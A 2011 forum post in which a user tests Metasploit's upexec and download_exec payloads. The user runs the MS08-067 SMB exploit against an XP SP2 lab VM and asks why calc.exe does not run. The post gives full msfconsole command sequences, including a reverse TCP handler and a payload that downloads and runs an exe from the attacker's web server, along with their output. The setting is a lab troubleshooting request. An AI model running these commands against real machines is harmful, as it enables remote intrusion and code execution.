HiramKey Posted February 1, 2011

I never explored the upexec and download_exec payloads of the Metasploit framework. So the purpose of the test is to download/upload and execute an exe file as the payload. To run some tests I'm using two VMs, one with BT4 RC2 and an XP SP2 as the victim. The victim has the firewall disabled and no antivirus. I'm trying to upload/download and execute the Windows calculator (calc.exe).

I know that with a meterpreter session it is possible with a simple upload and execute, but I'm experiencing some problems with both of the following procedures:

1 ------------ WITH UPEXEC:

use exploit/windows/smb/ms08_067_netapi
set payload windows/upexec/reverse_tcp
set lhost 192.168.1.1
set rhost 192.168.1.2
set pexec /root/data/payloads/test/calc.exe
exploit

I got…

Started reverse handler on 192.168.1.1:4444
Automatically detecting the target...
Fingerprint: Windows XP - Service Pack 2
Selected Target: Windows XP SP2 (NX)
Attempting to trigger the vulnerability...
Sending stage (398 bytes) to 192.168.1.2
Sleeping before handling stage...

And it hangs there without any result; the victim does not run calc.exe.

2 ------------ WITH DOWNLOAD_EXEC:

use exploit/windows/smb/ms08_067_netapi
set payload windows/download_exec
set lhost 192.168.1.1
set rhost 192.168.1.2
set url http://192.168.1.1/c.exe (httpd obviously active)
exploit

I got…

Automatically detecting the target...
Fingerprint: Windows XP - Service Pack 2
Selected Target: Windows XP SP2 (NX)
Attempting to trigger the vulnerability...
Exploit completed, but no session was created.

Even in that case the exe is not executed on the victim… So I think I'm missing something:

1. Am I doing something wrong with the procedure?
2. Does a win32 exe need to be pre-encoded in a different format to be injected?

Is somebody here in the community able to use that payload, and kind enough to help me?

Namasté.